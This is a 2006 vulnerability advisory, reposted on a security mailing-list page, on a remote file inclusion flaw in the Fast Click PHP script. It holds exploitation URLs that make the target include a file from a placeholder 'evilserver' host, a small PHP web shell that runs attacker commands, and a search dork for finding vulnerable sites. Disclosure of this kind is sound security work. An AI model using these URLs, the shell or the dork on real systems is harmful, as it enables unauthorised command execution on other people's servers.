Fast Click <= 2.3.8 Remote File Inclusion May 02 2006 07:09PM
Aminrayden yahoo com
Fast Click <= 2.3.8 Remote File Inclusion

-------------------------------------------------------

Aria-security.com advisory

Bug Discovered by R@1D3N (amin emami)

email:AminRayden (at) yahoo (dot) com [email concealed] and rayden (at) aria-security (dot) net [email concealed]

Date:02/05/2006

original advisory:http://www.aria-security.net/advisory/fc/fastclick.txt

--------------------------------------------------------

Affected software description:

Fast Click <= 2.3.8

Vendor:http://www.ftrain.siteburg.com/fclicksqlpro/fclick.php?fclick

Vulnerability: remote file inclusion

Dork:inurl:"fclick.php?fid"

---------------------------------------------------------

Disscution:

The problem exists is in the files "show.php" and "top.php" when include the

variable $Path

Vulnerable Code:

include($path."cfg.php")

Exploitation example:

http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=
uname -a

http://[target].com/[path]/top.php?path=http://evilserver/cmd.gif?&cmd=u
name -a

---------------------------------------------------------

cmd.gif

-----------

<?

system($cmd);

?>

-----------

* Fix *:

Contact the Vendor

===========================================================

Aria Security Research

Http://www.aria-security.net

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus